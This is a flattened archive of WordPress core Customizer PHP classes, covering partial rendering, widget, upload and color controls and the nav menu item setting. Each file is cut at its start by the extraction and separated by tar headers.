* @param string $partial_class WP_Customize_Partial or a subclass.
* @param string $partial_id ID for dynamic partial.
* @param array $partial_args The arguments to the WP_Customize_Partial constructor.
*/
$partial_class = apply_filters( 'customize_dynamic_partial_class', $partial_class, $partial_id, $partial_args );
$partial = new $partial_class( $this, $partial_id, $partial_args );
$this->add_partial( $partial );
$new_partials[] = $partial;
}
return $new_partials;
}
/**
* Checks whether the request is for rendering partials.
*
* Note that this will not consider whether the request is authorized or valid,
* just that essentially the route is a match.
*
* @since 4.5.0
*
* @return bool Whether the request is for rendering partials.
*/
public function is_render_partials_request() {
return ! empty( $_POST[ self::RENDER_QUERY_VAR ] );
}
/**
* Handles PHP errors triggered during rendering the partials.
*
* These errors will be relayed back to the client in the Ajax response.
*
* @since 4.5.0
*
* @param int $errno Error number.
* @param string $errstr Error string.
* @param string $errfile Error file.
* @param int $errline Error line.
* @return true Always true.
*/
public function handle_error( $errno, $errstr, $errfile = null, $errline = null ) {
$this->triggered_errors[] = array(
'partial' => $this->current_partial_id,
'error_number' => $errno,
'error_string' => $errstr,
'error_file' => $errfile,
'error_line' => $errline,
);
return true;
}
/**
* Handles the Ajax request to return the rendered partials for the requested placements.
*
* @since 4.5.0
*/
public function handle_render_partials_request() {
if ( ! $this->is_render_partials_request() ) {
return;
}
/*
* Note that is_customize_preview() returning true will entail that the
* user passed the 'customize' capability check and the nonce check, since
* WP_Customize_Manager::setup_theme() is where the previewing flag is set.
*/
if ( ! is_customize_preview() ) {
wp_send_json_error( 'expected_customize_preview', 403 );
} elseif ( ! isset( $_POST['partials'] ) ) {
wp_send_json_error( 'missing_partials', 400 );
}
// Ensure that doing selective refresh on 404 template doesn't result in fallback rendering behavior (full refreshes).
status_header( 200 );
$partials = json_decode( wp_unslash( $_POST['partials'] ), true );
if ( ! is_array( $partials ) ) {
wp_send_json_error( 'malformed_partials' );
}
$this->add_dynamic_partials( array_keys( $partials ) );
/**
* Fires immediately before partials are rendered.
*
* Plugins may do things like call wp_enqueue_scripts() and gather a list of the scripts
* and styles which may get enqueued in the response.
*
* @since 4.5.0
*
* @param WP_Customize_Selective_Refresh $refresh Selective refresh component.
* @param array $partials Placements' context data for the partials rendered in the request.
* The array is keyed by partial ID, with each item being an array of
* the placements' context data.
*/
do_action( 'customize_render_partials_before', $this, $partials );
set_error_handler( array( $this, 'handle_error' ), error_reporting() );
$contents = array();
foreach ( $partials as $partial_id => $container_contexts ) {
$this->current_partial_id = $partial_id;
if ( ! is_array( $container_contexts ) ) {
wp_send_json_error( 'malformed_container_contexts' );
}
$partial = $this->get_partial( $partial_id );
if ( ! $partial || ! $partial->check_capabilities() ) {
$contents[ $partial_id ] = null;
continue;
}
$contents[ $partial_id ] = array();
// @todo The array should include not only the contents, but also whether the container is included?
if ( empty( $container_contexts ) ) {
// Since there are no container contexts, render just once.
$contents[ $partial_id ][] = $partial->render( null );
} else {
foreach ( $container_contexts as $container_context ) {
$contents[ $partial_id ][] = $partial->render( $container_context );
}
}
}
$this->current_partial_id = null;
restore_error_handler();
/**
* Fires immediately after partials are rendered.
*
* Plugins may do things like call wp_footer() to scrape scripts output and return them
* via the {@see 'customize_render_partials_response'} filter.
*
* @since 4.5.0
*
* @param WP_Customize_Selective_Refresh $refresh Selective refresh component.
* @param array $partials Placements' context data for the partials rendered in the request.
* The array is keyed by partial ID, with each item being an array of
* the placements' context data.
*/
do_action( 'customize_render_partials_after', $this, $partials );
$response = array(
'contents' => $contents,
);
if ( defined( 'WP_DEBUG_DISPLAY' ) && WP_DEBUG_DISPLAY ) {
$response['errors'] = $this->triggered_errors;
}
$setting_validities = $this->manager->validate_setting_values( $this->manager->unsanitized_post_values() );
$exported_setting_validities = array_map( array( $this->manager, 'prepare_setting_validity_for_js' ), $setting_validities );
$response['setting_validities'] = $exported_setting_validities;
/**
* Filters the response from rendering the partials.
*
* Plugins may use this filter to inject `$scripts` and `$styles`, which are dependencies
* for the partials being rendered. The response data will be available to the client via
* the `render-partials-response` JS event, so the client can then inject the scripts and
* styles into the DOM if they have not already been enqueued there.
*
* If plugins do this, they'll need to take care for any scripts that do `document.write()`
* and make sure that these are not injected, or else to override the function to no-op,
* or else the page will be destroyed.
*
* Plugins should be aware that `$scripts` and `$styles` may eventually be included by
* default in the response.
*
* @since 4.5.0
*
* @param array $response {
* Response.
*
* @type array $contents Associative array mapping a partial ID its corresponding array of contents
* for the containers requested.
* @type array $errors List of errors triggered during rendering of partials, if `WP_DEBUG_DISPLAY`
* is enabled.
* }
* @param WP_Customize_Selective_Refresh $refresh Selective refresh component.
* @param array $partials Placements' context data for the partials rendered in the request.
* The array is keyed by partial ID, with each item being an array of
* the placements' context data.
*/
$response = apply_filters( 'customize_render_partials_response', $response, $this, $partials );
wp_send_json_success( $response );
}
}
class-wp-widget-form-customize-control.php 0000644 00000005126 15222250760 0014733 0 ustar 00 json[ $key ] = $this->$key;
}
// Get the widget_control and widget_content.
require_once ABSPATH . 'wp-admin/includes/widgets.php';
$widget = $wp_registered_widgets[ $this->widget_id ];
if ( ! isset( $widget['params'][0] ) ) {
$widget['params'][0] = array();
}
$args = array(
'widget_id' => $widget['id'],
'widget_name' => $widget['name'],
);
$args = wp_list_widget_controls_dynamic_sidebar(
array(
0 => $args,
1 => $widget['params'][0],
)
);
$widget_control_parts = $this->manager->widgets->get_widget_control_parts( $args );
$this->json['widget_control'] = $widget_control_parts['control'];
$this->json['widget_content'] = $widget_control_parts['content'];
}
/**
* Override render_content to be no-op since content is exported via to_json for deferred embedding.
*
* @since 3.9.0
*/
public function render_content() {}
/**
* Whether the current widget is rendered on the page.
*
* @since 4.0.0
*
* @return bool Whether the widget is rendered.
*/
public function active_callback() {
return $this->manager->widgets->is_widget_rendered( $this->widget_id );
}
}
class-wp-customize-upload-control.php 0000644 00000002255 15222250760 0013773 0 ustar 00 value();
if ( $value ) {
// Get the attachment model for the existing file.
$attachment_id = attachment_url_to_postid( $value );
if ( $attachment_id ) {
$this->json['attachment'] = wp_prepare_attachment_for_js( $attachment_id );
}
}
}
}
class-wp-customize-nav-menu-item-setting.php 0000644 00000066335 15222250760 0015177 0 ustar 00 -?\d+)\]$/';
const POST_TYPE = 'nav_menu_item';
const TYPE = 'nav_menu_item';
/**
* Setting type.
*
* @since 4.3.0
* @var string
*/
public $type = self::TYPE;
/**
* Default setting value.
*
* @since 4.3.0
* @var array
*
* @see wp_setup_nav_menu_item()
*/
public $default = array(
// The $menu_item_data for wp_update_nav_menu_item().
'object_id' => 0,
'object' => '', // Taxonomy name.
'menu_item_parent' => 0, // A.K.A. menu-item-parent-id; note that post_parent is different, and not included.
'position' => 0, // A.K.A. menu_order.
'type' => 'custom', // Note that type_label is not included here.
'title' => '',
'url' => '',
'target' => '',
'attr_title' => '',
'description' => '',
'classes' => '',
'xfn' => '',
'status' => 'publish',
'nav_menu_term_id' => 0, // This will be supplied as the $menu_id arg for wp_update_nav_menu_item().
'_invalid' => false,
);
/**
* Default transport.
*
* @since 4.3.0
* @since 4.5.0 Default changed to 'refresh'
* @var string
*/
public $transport = 'refresh';
/**
* The post ID represented by this setting instance. This is the db_id.
*
* A negative value represents a placeholder ID for a new menu not yet saved.
*
* @since 4.3.0
* @var int
*/
public $post_id;
/**
* Storage of pre-setup menu item to prevent wasted calls to wp_setup_nav_menu_item().
*
* @since 4.3.0
* @var array|null
*/
protected $value;
/**
* Previous (placeholder) post ID used before creating a new menu item.
*
* This value will be exported to JS via the customize_save_response filter
* so that JavaScript can update the settings to refer to the newly-assigned
* post ID. This value is always negative to indicate it does not refer to
* a real post.
*
* @since 4.3.0
* @var int
*
* @see WP_Customize_Nav_Menu_Item_Setting::update()
* @see WP_Customize_Nav_Menu_Item_Setting::amend_customize_save_response()
*/
public $previous_post_id;
/**
* When previewing or updating a menu item, this stores the previous nav_menu_term_id
* which ensures that we can apply the proper filters.
*
* @since 4.3.0
* @var int
*/
public $original_nav_menu_term_id;
/**
* Whether or not update() was called.
*
* @since 4.3.0
* @var bool
*/
protected $is_updated = false;
/**
* Status for calling the update method, used in customize_save_response filter.
*
* See {@see 'customize_save_response'}.
*
* When status is inserted, the placeholder post ID is stored in $previous_post_id.
* When status is error, the error is stored in $update_error.
*
* @since 4.3.0
* @var string updated|inserted|deleted|error
*
* @see WP_Customize_Nav_Menu_Item_Setting::update()
* @see WP_Customize_Nav_Menu_Item_Setting::amend_customize_save_response()
*/
public $update_status;
/**
* Any error object returned by wp_update_nav_menu_item() when setting is updated.
*
* @since 4.3.0
* @var WP_Error
*
* @see WP_Customize_Nav_Menu_Item_Setting::update()
* @see WP_Customize_Nav_Menu_Item_Setting::amend_customize_save_response()
*/
public $update_error;
/**
* Constructor.
*
* Any supplied $args override class property defaults.
*
* @since 4.3.0
*
* @throws Exception If $id is not valid for this setting type.
*
* @param WP_Customize_Manager $manager Customizer bootstrap instance.
* @param string $id A specific ID of the setting.
* Can be a theme mod or option name.
* @param array $args Optional. Setting arguments.
*/
public function __construct( WP_Customize_Manager $manager, $id, array $args = array() ) {
if ( empty( $manager->nav_menus ) ) {
throw new Exception( 'Expected WP_Customize_Manager::$nav_menus to be set.' );
}
if ( ! preg_match( self::ID_PATTERN, $id, $matches ) ) {
throw new Exception( "Illegal widget setting ID: $id" );
}
$this->post_id = (int) $matches['id'];
add_action( 'wp_update_nav_menu_item', array( $this, 'flush_cached_value' ), 10, 2 );
parent::__construct( $manager, $id, $args );
// Ensure that an initially-supplied value is valid.
if ( isset( $this->value ) ) {
$this->populate_value();
foreach ( array_diff( array_keys( $this->default ), array_keys( $this->value ) ) as $missing ) {
throw new Exception( "Supplied nav_menu_item value missing property: $missing" );
}
}
}
/**
* Clear the cached value when this nav menu item is updated.
*
* @since 4.3.0
*
* @param int $menu_id The term ID for the menu.
* @param int $menu_item_id The post ID for the menu item.
*/
public function flush_cached_value( $menu_id, $menu_item_id ) {
unset( $menu_id );
if ( $menu_item_id === $this->post_id ) {
$this->value = null;
}
}
/**
* Get the instance data for a given nav_menu_item setting.
*
* @since 4.3.0
*
* @see wp_setup_nav_menu_item()
*
* @return array|false Instance data array, or false if the item is marked for deletion.
*/
public function value() {
$type_label = null;
if ( $this->is_previewed && get_current_blog_id() === $this->_previewed_blog_id ) {
$undefined = new stdClass(); // Symbol.
$post_value = $this->post_value( $undefined );
if ( $undefined === $post_value ) {
$value = $this->_original_value;
} else {
$value = $post_value;
}
} elseif ( isset( $this->value ) ) {
$value = $this->value;
} else {
$value = false;
// Note that an ID of less than one indicates a nav_menu not yet inserted.
if ( $this->post_id > 0 ) {
$post = get_post( $this->post_id );
if ( $post && self::POST_TYPE === $post->post_type ) {
$is_title_empty = empty( $post->post_title );
$value = (array) wp_setup_nav_menu_item( $post );
if ( isset( $value['type_label'] ) ) {
$type_label = $value['type_label'];
}
if ( $is_title_empty ) {
$value['title'] = '';
}
}
}
if ( ! is_array( $value ) ) {
$value = $this->default;
}
// Cache the value for future calls to avoid having to re-call wp_setup_nav_menu_item().
$this->value = $value;
$this->populate_value();
$value = $this->value;
}
// These properties are read-only and are part of the setting for use in the Customizer UI.
if ( is_array( $value ) ) {
$value_obj = (object) $value;
$value['type_label'] = isset( $type_label ) ? $type_label : $this->get_type_label( $value_obj );
$value['original_title'] = $this->get_original_title( $value_obj );
}
return $value;
}
/**
* Prepares the value for editing on the client.
*
* @since 6.8.3
*
* @return array|false Value prepared for the client.
*/
public function js_value() {
$value = parent::js_value();
if ( is_array( $value ) && isset( $value['original_title'] ) ) {
// Decode entities for the sake of displaying the original title as a placeholder.
$value['original_title'] = html_entity_decode( $value['original_title'], ENT_QUOTES, get_bloginfo( 'charset' ) );
}
return $value;
}
/**
* Get original title.
*
* @since 4.7.0
*
* @param object $item Nav menu item.
* @return string The original title, without entity decoding.
*/
protected function get_original_title( $item ) {
$original_title = '';
if ( 'post_type' === $item->type && ! empty( $item->object_id ) ) {
$original_object = get_post( $item->object_id );
if ( $original_object ) {
/** This filter is documented in wp-includes/post-template.php */
$original_title = apply_filters( 'the_title', $original_object->post_title, $original_object->ID );
if ( '' === $original_title ) {
/* translators: %d: ID of a post. */
$original_title = sprintf( __( '#%d (no title)' ), $original_object->ID );
}
}
} elseif ( 'taxonomy' === $item->type && ! empty( $item->object_id ) ) {
$original_term_title = get_term_field( 'name', $item->object_id, $item->object, 'raw' );
if ( ! is_wp_error( $original_term_title ) ) {
$original_title = $original_term_title;
}
} elseif ( 'post_type_archive' === $item->type ) {
$original_object = get_post_type_object( $item->object );
if ( $original_object ) {
$original_title = $original_object->labels->archives;
}
}
return $original_title;
}
/**
* Get type label.
*
* @since 4.7.0
*
* @param object $item Nav menu item.
* @return string The type label.
*/
protected function get_type_label( $item ) {
if ( 'post_type' === $item->type ) {
$object = get_post_type_object( $item->object );
if ( $object ) {
$type_label = $object->labels->singular_name;
} else {
$type_label = $item->object;
}
} elseif ( 'taxonomy' === $item->type ) {
$object = get_taxonomy( $item->object );
if ( $object ) {
$type_label = $object->labels->singular_name;
} else {
$type_label = $item->object;
}
} elseif ( 'post_type_archive' === $item->type ) {
$type_label = __( 'Post Type Archive' );
} else {
$type_label = __( 'Custom Link' );
}
return $type_label;
}
/**
* Ensure that the value is fully populated with the necessary properties.
*
* Translates some properties added by wp_setup_nav_menu_item() and removes others.
*
* @since 4.3.0
*
* @see WP_Customize_Nav_Menu_Item_Setting::value()
*/
protected function populate_value() {
if ( ! is_array( $this->value ) ) {
return;
}
if ( isset( $this->value['menu_order'] ) ) {
$this->value['position'] = $this->value['menu_order'];
unset( $this->value['menu_order'] );
}
if ( isset( $this->value['post_status'] ) ) {
$this->value['status'] = $this->value['post_status'];
unset( $this->value['post_status'] );
}
if ( ! isset( $this->value['nav_menu_term_id'] ) && $this->post_id > 0 ) {
$menus = wp_get_post_terms(
$this->post_id,
WP_Customize_Nav_Menu_Setting::TAXONOMY,
array(
'fields' => 'ids',
)
);
if ( ! empty( $menus ) ) {
$this->value['nav_menu_term_id'] = array_shift( $menus );
} else {
$this->value['nav_menu_term_id'] = 0;
}
}
foreach ( array( 'object_id', 'menu_item_parent', 'nav_menu_term_id' ) as $key ) {
if ( ! is_int( $this->value[ $key ] ) ) {
$this->value[ $key ] = (int) $this->value[ $key ];
}
}
foreach ( array( 'classes', 'xfn' ) as $key ) {
if ( is_array( $this->value[ $key ] ) ) {
$this->value[ $key ] = implode( ' ', $this->value[ $key ] );
}
}
if ( ! isset( $this->value['title'] ) ) {
$this->value['title'] = '';
}
if ( ! isset( $this->value['_invalid'] ) ) {
$this->value['_invalid'] = false;
$is_known_invalid = (
( ( 'post_type' === $this->value['type'] || 'post_type_archive' === $this->value['type'] ) && ! post_type_exists( $this->value['object'] ) )
||
( 'taxonomy' === $this->value['type'] && ! taxonomy_exists( $this->value['object'] ) )
);
if ( $is_known_invalid ) {
$this->value['_invalid'] = true;
}
}
// Remove remaining properties available on a setup nav_menu_item post object which aren't relevant to the setting value.
$irrelevant_properties = array(
'ID',
'comment_count',
'comment_status',
'db_id',
'filter',
'guid',
'ping_status',
'pinged',
'post_author',
'post_content',
'post_content_filtered',
'post_date',
'post_date_gmt',
'post_excerpt',
'post_mime_type',
'post_modified',
'post_modified_gmt',
'post_name',
'post_parent',
'post_password',
'post_title',
'post_type',
'to_ping',
);
foreach ( $irrelevant_properties as $property ) {
unset( $this->value[ $property ] );
}
}
/**
* Handle previewing the setting.
*
* @since 4.3.0
* @since 4.4.0 Added boolean return value.
*
* @see WP_Customize_Manager::post_value()
*
* @return bool False if method short-circuited due to no-op.
*/
public function preview() {
if ( $this->is_previewed ) {
return false;
}
$undefined = new stdClass();
$is_placeholder = ( $this->post_id < 0 );
$is_dirty = ( $undefined !== $this->post_value( $undefined ) );
if ( ! $is_placeholder && ! $is_dirty ) {
return false;
}
$this->is_previewed = true;
$this->_original_value = $this->value();
$this->original_nav_menu_term_id = $this->_original_value['nav_menu_term_id'];
$this->_previewed_blog_id = get_current_blog_id();
add_filter( 'wp_get_nav_menu_items', array( $this, 'filter_wp_get_nav_menu_items' ), 10, 3 );
$sort_callback = array( __CLASS__, 'sort_wp_get_nav_menu_items' );
if ( ! has_filter( 'wp_get_nav_menu_items', $sort_callback ) ) {
add_filter( 'wp_get_nav_menu_items', array( __CLASS__, 'sort_wp_get_nav_menu_items' ), 1000, 3 );
}
// @todo Add get_post_metadata filters for plugins to add their data.
return true;
}
/**
* Filters the wp_get_nav_menu_items() result to supply the previewed menu items.
*
* @since 4.3.0
*
* @see wp_get_nav_menu_items()
*
* @param WP_Post[] $items An array of menu item post objects.
* @param WP_Term $menu The menu object.
* @param array $args An array of arguments used to retrieve menu item objects.
* @return WP_Post[] Array of menu item objects.
*/
public function filter_wp_get_nav_menu_items( $items, $menu, $args ) {
$this_item = $this->value();
$current_nav_menu_term_id = null;
if ( isset( $this_item['nav_menu_term_id'] ) ) {
$current_nav_menu_term_id = $this_item['nav_menu_term_id'];
unset( $this_item['nav_menu_term_id'] );
}
$should_filter = (
$menu->term_id === $this->original_nav_menu_term_id
||
$menu->term_id === $current_nav_menu_term_id
);
if ( ! $should_filter ) {
return $items;
}
// Handle deleted menu item, or menu item moved to another menu.
$should_remove = (
false === $this_item
||
( isset( $this_item['_invalid'] ) && true === $this_item['_invalid'] )
||
(
$this->original_nav_menu_term_id === $menu->term_id
&&
$current_nav_menu_term_id !== $this->original_nav_menu_term_id
)
);
if ( $should_remove ) {
$filtered_items = array();
foreach ( $items as $item ) {
if ( $item->db_id !== $this->post_id ) {
$filtered_items[] = $item;
}
}
return $filtered_items;
}
$mutated = false;
$should_update = (
is_array( $this_item )
&&
$current_nav_menu_term_id === $menu->term_id
);
if ( $should_update ) {
foreach ( $items as $item ) {
if ( $item->db_id === $this->post_id ) {
foreach ( get_object_vars( $this->value_as_wp_post_nav_menu_item() ) as $key => $value ) {
$item->$key = $value;
}
$mutated = true;
}
}
// Not found so we have to append it..
if ( ! $mutated ) {
$items[] = $this->value_as_wp_post_nav_menu_item();
}
}
return $items;
}
/**
* Re-apply the tail logic also applied on $items by wp_get_nav_menu_items().
*
* @since 4.3.0
*
* @see wp_get_nav_menu_items()
*
* @param WP_Post[] $items An array of menu item post objects.
* @param WP_Term $menu The menu object.
* @param array $args An array of arguments used to retrieve menu item objects.
* @return WP_Post[] Array of menu item objects.
*/
public static function sort_wp_get_nav_menu_items( $items, $menu, $args ) {
// @todo We should probably re-apply some constraints imposed by $args.
unset( $args['include'] );
// Remove invalid items only in front end.
if ( ! is_admin() ) {
$items = array_filter( $items, '_is_valid_nav_menu_item' );
}
if ( ARRAY_A === $args['output'] ) {
$items = wp_list_sort(
$items,
array(
$args['output_key'] => 'ASC',
)
);
$i = 1;
foreach ( $items as $k => $item ) {
$items[ $k ]->{$args['output_key']} = $i++;
}
}
return $items;
}
/**
* Get the value emulated into a WP_Post and set up as a nav_menu_item.
*
* @since 4.3.0
*
* @return WP_Post With wp_setup_nav_menu_item() applied.
*/
public function value_as_wp_post_nav_menu_item() {
$item = (object) $this->value();
unset( $item->nav_menu_term_id );
$item->post_status = $item->status;
unset( $item->status );
$item->post_type = 'nav_menu_item';
$item->menu_order = $item->position;
unset( $item->position );
if ( empty( $item->title ) && ! empty( $item->original_title ) ) {
$item->title = $item->original_title; // This is NOT entity-decoded. It comes from self::get_original_title().
}
if ( $item->title ) {
$item->post_title = $item->title;
}
// 'classes' should be an array, as in wp_setup_nav_menu_item().
if ( isset( $item->classes ) && is_scalar( $item->classes ) ) {
$item->classes = explode( ' ', $item->classes );
}
$item->ID = $this->post_id;
$item->db_id = $this->post_id;
$post = new WP_Post( (object) $item );
if ( empty( $post->post_author ) ) {
$post->post_author = get_current_user_id();
}
if ( ! isset( $post->type_label ) ) {
$post->type_label = $this->get_type_label( $post );
}
// Ensure nav menu item URL is set according to linked object.
if ( 'post_type' === $post->type && ! empty( $post->object_id ) ) {
$post->url = get_permalink( $post->object_id );
} elseif ( 'taxonomy' === $post->type && ! empty( $post->object ) && ! empty( $post->object_id ) ) {
$post->url = get_term_link( (int) $post->object_id, $post->object );
} elseif ( 'post_type_archive' === $post->type && ! empty( $post->object ) ) {
$post->url = get_post_type_archive_link( $post->object );
}
if ( is_wp_error( $post->url ) ) {
$post->url = '';
}
/** This filter is documented in wp-includes/nav-menu.php */
$post->attr_title = apply_filters( 'nav_menu_attr_title', $post->attr_title );
/** This filter is documented in wp-includes/nav-menu.php */
$post->description = apply_filters( 'nav_menu_description', wp_trim_words( $post->description, 200 ) );
/** This filter is documented in wp-includes/nav-menu.php */
$post = apply_filters( 'wp_setup_nav_menu_item', $post );
return $post;
}
/**
* Sanitize an input.
*
* Note that parent::sanitize() erroneously does wp_unslash() on $value, but
* we remove that in this override.
*
* @since 4.3.0
* @since 5.9.0 Renamed `$menu_item_value` to `$value` for PHP 8 named parameter support.
*
* @param array|false $value The menu item value to sanitize.
* @return array|false|null|WP_Error Null or WP_Error if an input isn't valid. False if it is marked for deletion.
* Otherwise the sanitized value.
*/
public function sanitize( $value ) {
// Restores the more descriptive, specific name for use within this method.
$menu_item_value = $value;
// Menu is marked for deletion.
if ( false === $menu_item_value ) {
return $menu_item_value;
}
// Invalid.
if ( ! is_array( $menu_item_value ) ) {
return null;
}
$default = array(
'object_id' => 0,
'object' => '',
'menu_item_parent' => 0,
'position' => 0,
'type' => 'custom',
'title' => '',
'url' => '',
'target' => '',
'attr_title' => '',
'description' => '',
'classes' => '',
'xfn' => '',
'status' => 'publish',
'original_title' => '',
'nav_menu_term_id' => 0,
'_invalid' => false,
);
$menu_item_value = array_merge( $default, $menu_item_value );
$menu_item_value = wp_array_slice_assoc( $menu_item_value, array_keys( $default ) );
$menu_item_value['position'] = (int) $menu_item_value['position'];
foreach ( array( 'object_id', 'menu_item_parent', 'nav_menu_term_id' ) as $key ) {
// Note we need to allow negative-integer IDs for previewed objects not inserted yet.
$menu_item_value[ $key ] = (int) $menu_item_value[ $key ];
}
foreach ( array( 'type', 'object', 'target' ) as $key ) {
$menu_item_value[ $key ] = sanitize_key( $menu_item_value[ $key ] );
}
foreach ( array( 'xfn', 'classes' ) as $key ) {
$value = $menu_item_value[ $key ];
if ( ! is_array( $value ) ) {
$value = explode( ' ', $value );
}
$menu_item_value[ $key ] = implode( ' ', array_map( 'sanitize_html_class', $value ) );
}
// Apply the same filters as when calling wp_insert_post().
/** This filter is documented in wp-includes/post.php */
$menu_item_value['title'] = wp_unslash( apply_filters( 'title_save_pre', wp_slash( $menu_item_value['title'] ) ) );
/** This filter is documented in wp-includes/post.php */
$menu_item_value['attr_title'] = wp_unslash( apply_filters( 'excerpt_save_pre', wp_slash( $menu_item_value['attr_title'] ) ) );
/** This filter is documented in wp-includes/post.php */
$menu_item_value['description'] = wp_unslash( apply_filters( 'content_save_pre', wp_slash( $menu_item_value['description'] ) ) );
if ( '' !== $menu_item_value['url'] ) {
$menu_item_value['url'] = sanitize_url( $menu_item_value['url'] );
if ( '' === $menu_item_value['url'] ) {
return new WP_Error( 'invalid_url', __( 'Invalid URL.' ) ); // Fail sanitization if URL is invalid.
}
}
if ( 'publish' !== $menu_item_value['status'] ) {
$menu_item_value['status'] = 'draft';
}
$menu_item_value['_invalid'] = (bool) $menu_item_value['_invalid'];
/** This filter is documented in wp-includes/class-wp-customize-setting.php */
return apply_filters( "customize_sanitize_{$this->id}", $menu_item_value, $this );
}
/**
* Creates/updates the nav_menu_item post for this setting.
*
* Any created menu items will have their assigned post IDs exported to the client
* via the {@see 'customize_save_response'} filter. Likewise, any errors will be
* exported to the client via the customize_save_response() filter.
*
* To delete a menu, the client can send false as the value.
*
* @since 4.3.0
*
* @see wp_update_nav_menu_item()
*
* @param array|false $value The menu item array to update. If false, then the menu item will be deleted
* entirely. See WP_Customize_Nav_Menu_Item_Setting::$default for what the value
* should consist of.
* @return null|void
*/
protected function update( $value ) {
if ( $this->is_updated ) {
return;
}
$this->is_updated = true;
$is_placeholder = ( $this->post_id < 0 );
$is_delete = ( false === $value );
// Update the cached value.
$this->value = $value;
add_filter( 'customize_save_response', array( $this, 'amend_customize_save_response' ) );
if ( $is_delete ) {
// If the current setting post is a placeholder, a delete request is a no-op.
if ( $is_placeholder ) {
$this->update_status = 'deleted';
} else {
$r = wp_delete_post( $this->post_id, true );
if ( false === $r ) {
$this->update_error = new WP_Error( 'delete_failure' );
$this->update_status = 'error';
} else {
$this->update_status = 'deleted';
}
// @todo send back the IDs for all associated nav menu items deleted, so these settings (and controls) can be removed from Customizer?
}
} else {
// Handle saving menu items for menus that are being newly-created.
if ( $value['nav_menu_term_id'] < 0 ) {
$nav_menu_setting_id = sprintf( 'nav_menu[%s]', $value['nav_menu_term_id'] );
$nav_menu_setting = $this->manager->get_setting( $nav_menu_setting_id );
if ( ! $nav_menu_setting || ! ( $nav_menu_setting instanceof WP_Customize_Nav_Menu_Setting ) ) {
$this->update_status = 'error';
$this->update_error = new WP_Error( 'unexpected_nav_menu_setting' );
return;
}
if ( false === $nav_menu_setting->save() ) {
$this->update_status = 'error';
$this->update_error = new WP_Error( 'nav_menu_setting_failure' );
return;
}
if ( (int) $value['nav_menu_term_id'] !== $nav_menu_setting->previous_term_id ) {
$this->update_status = 'error';
$this->update_error = new WP_Error( 'unexpected_previous_term_id' );
return;
}
$value['nav_menu_term_id'] = $nav_menu_setting->term_id;
}
// Handle saving a nav menu item that is a child of a nav menu item being newly-created.
if ( $value['menu_item_parent'] < 0 ) {
$parent_nav_menu_item_setting_id = sprintf( 'nav_menu_item[%s]', $value['menu_item_parent'] );
$parent_nav_menu_item_setting = $this->manager->get_setting( $parent_nav_menu_item_setting_id );
if ( ! $parent_nav_menu_item_setting || ! ( $parent_nav_menu_item_setting instanceof WP_Customize_Nav_Menu_Item_Setting ) ) {
$this->update_status = 'error';
$this->update_error = new WP_Error( 'unexpected_nav_menu_item_setting' );
return;
}
if ( false === $parent_nav_menu_item_setting->save() ) {
$this->update_status = 'error';
$this->update_error = new WP_Error( 'nav_menu_item_setting_failure' );
return;
}
if ( (int) $value['menu_item_parent'] !== $parent_nav_menu_item_setting->previous_post_id ) {
$this->update_status = 'error';
$this->update_error = new WP_Error( 'unexpected_previous_post_id' );
return;
}
$value['menu_item_parent'] = $parent_nav_menu_item_setting->post_id;
}
// Insert or update menu.
$menu_item_data = array(
'menu-item-object-id' => $value['object_id'],
'menu-item-object' => $value['object'],
'menu-item-parent-id' => $value['menu_item_parent'],
'menu-item-position' => $value['position'],
'menu-item-type' => $value['type'],
'menu-item-title' => $value['title'],
'menu-item-url' => $value['url'],
'menu-item-description' => $value['description'],
'menu-item-attr-title' => $value['attr_title'],
'menu-item-target' => $value['target'],
'menu-item-classes' => $value['classes'],
'menu-item-xfn' => $value['xfn'],
'menu-item-status' => $value['status'],
);
$r = wp_update_nav_menu_item(
$value['nav_menu_term_id'],
$is_placeholder ? 0 : $this->post_id,
wp_slash( $menu_item_data )
);
if ( is_wp_error( $r ) ) {
$this->update_status = 'error';
$this->update_error = $r;
} else {
if ( $is_placeholder ) {
$this->previous_post_id = $this->post_id;
$this->post_id = $r;
$this->update_status = 'inserted';
} else {
$this->update_status = 'updated';
}
}
}
}
/**
* Export data for the JS client.
*
* @since 4.3.0
*
* @see WP_Customize_Nav_Menu_Item_Setting::update()
*
* @param array $data Additional information passed back to the 'saved' event on `wp.customize`.
* @return array Save response data.
*/
public function amend_customize_save_response( $data ) {
if ( ! isset( $data['nav_menu_item_updates'] ) ) {
$data['nav_menu_item_updates'] = array();
}
$data['nav_menu_item_updates'][] = array(
'post_id' => $this->post_id,
'previous_post_id' => $this->previous_post_id,
'error' => $this->update_error ? $this->update_error->get_error_code() : null,
'status' => $this->update_status,
);
return $data;
}
}
class-wp-customize-color-control.php 0000644 00000006211 15222250760 0013621 0 ustar 00 statuses = array( '' => __( 'Default' ) );
parent::__construct( $manager, $id, $args );
}
/**
* Enqueue scripts/styles for the color picker.
*
* @since 3.4.0
*/
public function enqueue() {
wp_enqueue_script( 'wp-color-picker' );
wp_enqueue_style( 'wp-color-picker' );
}
/**
* Refresh the parameters passed to the JavaScript via JSON.
*
* @since 3.4.0
* @uses WP_Customize_Control::to_json()
*/
public function to_json() {
parent::to_json();
$this->json['statuses'] = $this->statuses;
$this->json['defaultValue'] = $this->setting->default;
$this->json['mode'] = $this->mode;
}
/**
* Don't render the control content from PHP, as it's rendered via JS on load.
*
* @since 3.4.0
*/
public function render_content() {}
/**
* Render a JS template for the content of the color picker control.
*
* @since 4.1.0
*/
public function content_template() {
?>
<#
var defaultValue = '#RRGGBB',
defaultValueAttr = '',
inputId = _.uniqueId( 'customize-color-control-input-' ),
isHueSlider = data.mode === 'hue';
if ( data.defaultValue && _.isString( data.defaultValue ) && ! isHueSlider ) {
if ( '#' !== data.defaultValue.substring( 0, 1 ) ) {
defaultValue = '#' + data.defaultValue;
} else {
defaultValue = data.defaultValue;
}
defaultValueAttr = ' data-default-color=' + defaultValue; // Quotes added automatically.
}
#>
<# if ( data.label ) { #>
{{{ data.label }}}
<# } #>
<# if ( data.description ) { #>
{{{ data.description }}}
<# } #>
<# if ( isHueSlider ) { #>
<# } else { #>
<# } #>
json['locationId'] = $this->location_id;
}
/**
* Render content just like a normal select control.
*
* @since 4.3.0
* @since 4.9.0 Added a button to create menus.
*/
public function render_content() {
if ( empty( $this->choices ) ) {
return;
}
$value_hidden_class = '';
$no_value_hidden_class = '';
if ( $this->value() ) {
$value_hidden_class = ' hidden';
} else {
$no_value_hidden_class = ' hidden';
}
?>
action;
$exported['filter_type'] = $this->filter_type;
return $exported;
}
/**
* Renders a themes section as a JS template.
*
* The template is only rendered by PHP once, so all actions are prepared at once on the server side.
*
* @since 4.9.0
*/
protected function render_template() {
?>
filter_bar_content_template(); ?>
